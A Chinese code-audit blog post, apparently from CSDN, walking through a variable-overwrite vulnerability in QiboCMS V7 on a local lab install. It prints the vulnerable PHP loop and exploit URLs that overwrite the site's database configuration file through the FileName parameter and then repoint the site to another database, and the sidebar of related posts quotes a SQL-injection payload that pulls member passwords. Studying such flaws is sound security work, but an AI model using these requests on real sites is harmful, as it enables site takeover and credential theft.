php代码审计【23】齐博CMS通杀漏洞漏洞

最新推荐文章于 2024-05-05 20:06:45 发布
最新推荐文章于 2024-05-05 20:06:45 发布
阅读量2k 收藏 2
点赞数
分类专栏: # php代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/107237728
版权

一、安装好齐博CMS_V7,安装完成后如下:

二、分析代码

common.inc.php

foreach($_COOKIE AS $_key=>$_value){
	unset($$_key);
}
foreach($_POST AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot 

 http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=xxxx.php

重新给filename赋值:,生成新的xxxx.php

这路的思路,就是将原来的数据库文件重新滞空,然后进行

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=../data/mysql_config.php(FileName区分大小写)

 

 访问首页:

重新赋值:(数据库换成自己的数据库地址)

http://192.168.189.129/qibo/index.php?dbhost=localhost&dbuser=root&dbpw=root&dbname=qibo_v7&pre=qb_

 

总结:总体思路,利用变量覆盖来重写数据库文件,然后对数据库文件重写连接服务器,进行代码利用。 

司徒荆
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
齐博CMS1.0全版本的sql注入漏洞
wanwan的博客
04-03 3349
详见:http://dingody.iteye.com/blog/2195864这里只说一下最后的利用,还是使用原作者指出的那个注入点,虽然value值保存在了两个sql语句里面,这两个语句的列不一样,如果利用第二个语句,会在第一个语句的时候报列不一致的错误;尝试利用第一个语句。我构造的语句是  1' union select password from qibosoft_members;#这里最...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
最新发布
2401_84263282的博客
05-05 912
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
齐博 php7,PHP代码审计理解(二)----齐博CMS7.0文件覆盖
weixin_42374930的博客
03-25 269
0x00 前言因为我是跟着视频操作的,这回真的没理解为什么定位到了这个存在漏洞的文件。。。/do/fujsarticle.php因为没有前文,所以这里无法分析这个$FileName为什么可以$_GET传值,此处我只看结果。后来看的时候发现可以逆推过来,应该是本来有哪个功能用到fujsarticle.php文件,这里就不纠结了。0x01 操作在包含全局配置文件前后输出一下这个变量$FileName...
齐博cms漏洞分析
一个码农的笔记
11-13 5573
这天看一些经典的审计的例子,看到齐博cms的2013年的一个老洞,这个漏洞我感觉很经典,这里总结一下,记个笔记 这个漏洞是变量覆盖的漏洞 首先出问题的地方是fujsarticle.php,下面是是整个文件的内容: <?php error_reporting(0);extract($_GET); require_once(dirname(__FILE__)."/../data/config
齐博CMS变量覆盖漏洞exp
热门推荐
Exploit的小站~
05-10 1万+
 漏洞的具体分析在 http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp。 利用步骤如下: (1)首先访问/member下面的“评论管理”功能,抓包 (2)在httprequest中构造一个attachment,如下: POST /qibo/mem...
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1392
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
齐博CMS开源PHP建站系统齐博CMS
04-06
齐博CMS选择PHP作为开发语言,得益于其开放源代码、跨平台、性能高效以及丰富的扩展库,使得开发者能快速构建动态网站。 2. **内容管理系统(CMS)** 内容管理系统是一种软件工具,帮助用户创建、管理、发布和组织...
齐博CMS源代码
03-18
齐博X1.0是参阅众家之所长而开发出来的系统,秉承PHP开源精神,齐博X1.0框架永久开源免费使用(也可免费用于商业),不区分商业版与免费版。 但为了能持续发展,引入更多的开发者,后续的插件与模块会有免费与收费的...
qibov7sql注入漏洞通杀
01-08
qibov7sql注入漏洞通杀
齐博CMS企业版建站系统 v2.0
11-30
9. **安全与维护**:齐博CMS企业版会定期更新,修复安全漏洞,确保网站的数据安全,同时提供技术支持和故障排查服务。 从提供的压缩包文件名称列表来看,"下载说明.htm"和"易采源码下载说明.txt"很可能是系统安装和...
齐博cms漏洞分析
weixin_34007906的博客
08-18 564
** 0x01 原理分析 **还是很早之前爆出来的漏洞,现在拿出来学习一下,参考阿里巴巴:https://security.alibaba.com/...漏洞发生在/inc/common.inc.php页面中。首先看这个函数: 首先使用ini_get来获取php.ini中变量'register_globals'的值,而register_g...
php代码审计【24】齐博CMS xss 漏洞漏洞
司徒荆的博客
07-12 956
齐博CMS xss 漏洞漏洞
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 5447
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
php代码审计【25】齐博CMS 无限制put 漏洞
司徒荆的博客
07-12 765
齐博CMS 无限制put 漏洞 无限制put
齐博 php7,齐博cmsv7.0后台getshell
weixin_31417135的博客
03-25 684
0x01 漏洞分析此漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。漏洞出现在:inc/class.inc.php中的GuideFidCache函数里/*导航条缓存*/function GuideFidCache($table,$filename="guide_fid.php",$TruePath=0){global $db,$webdb,$pre;if($table=="{$pr...
php基于错误的盲注,phpcms 2008广告模块注入漏洞及修复方案
weixin_29807369的博客
04-14 297
简要描述:phpcms 2008 中广告模块,存在参数过滤不严,导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,如果关闭了错误显示,可以采用基于时间和错误的盲注详细说明:js.phpchdir('../ads/');require './ad.php';?>ad.phprequire './include/common.inc.php';$year = date('ym',T...
maccms代码审计——前台sql注入漏洞
willow_liang的博客
11-06 1961
漏洞存在路径:C:\phpstudy\WWW\maccms\inc\common\function.php第572行的htmlEncode函数 审计过程: 1.在C:\phpstudy\WWW\maccms\inc\module\vod.php93-98 2.跟进图中的be方法
帝国cms报错 t_functions.php,帝国CMS常见英文错误提示与解决方法
weixin_33778479的博客
03-24 542
烈火网(LieHuo.Net)教程 本贴内容包含帝国CMS设置中及你的服务器本身问题引起的错误提示解决方法1. 登陆后台错误提示:(***此提示在新手使用过程中经常被遇到*** 大家要重视哦)Fatal error: Unable to read …. bytes …解答:请按二进制上传文件。因为这个提示就是没有按二进制上传,删除服务器上的文件,重新上传。如还这个提示,你只能考虑换个FTP软件。如...
齐博X1教程二(阿赖耶识与随风提供)-03041124.pdf
02-17
9. **数据转换**:教程还涉及其他CMS系统(如水平凡、lvyecms)向齐博X1的数据转换,方便用户迁移原有内容。 10. **模型字段内容页面调用**:针对内容模型的字段,教程给出了如何在页面上进行有效调用的技巧,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值